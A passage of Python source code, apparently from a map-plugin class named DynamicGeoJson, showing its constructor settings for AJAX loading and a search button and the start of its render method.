delimiter=\",\",\n live_update=True,\n button_text=\"Search this area\",\n ajax=None,\n ): # noqa\n super(DynamicGeoJson, self).__init__()\n self._name = \"DynamicGeoJson\"\n self.action = action\n self.url_root = url_root\n self.pattern = url_pattern\n self.order = order\n self.delimiter = delimiter\n self.live_update = live_update\n self.button_text = button_text\n\n self.ajax = {\"url\": \"\", \"dataType\": \"json\", \"async\": True}\n\n if ajax is not None:\n self.ajax.update(ajax)\n\n def render(self, **kwargs): # noqa\n super(DynamicGeoJson, self).render(**kwargs)\n figure = self.get_root()\n assert isinstance(figure, Figure), (\n \"You cannot render this Element \" \"if it is not in a Figure.\"\n )\n\n button_style = \"\"\"\n \n \"\"\"\n button_reload = \"\"\"\n